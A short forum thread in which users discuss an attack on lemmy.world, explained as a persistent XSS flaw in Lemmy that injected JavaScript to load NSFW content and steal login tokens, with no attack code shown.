Went there and got some… less than savory images. Do not recommend going there.

Did it get hacked or smth?

  • 0xtero@kbin.social
    link
    fedilink
    arrow-up
    11
    ·
    edit-2
    1 year ago

    Looks like Lemmy code has a security vulnerability, persistent XSS, that allows injection of Javascript into the sidebar and comments. That allowed the attacker to force load NSFW content even after lemmy.world admins cleaned up the first attack.

    There might have also been an admin account compromise at lemmy.world involved. Time will tell if these are related.

    Edit: Looks like the injected JS code also steals login tokens from your browser, so that explains the admin compromise. Probably a good idea to not visit Lemmy sites for time being (or block Javascript in your browser, which is always a good idea).

    • therealpygon@kbin.social
      link
      fedilink
      arrow-up
      2
      ·
      1 year ago

      Gee, who could have thought that allowing html in posts could be bad idea? -Every developer that has ever looked a OWASP.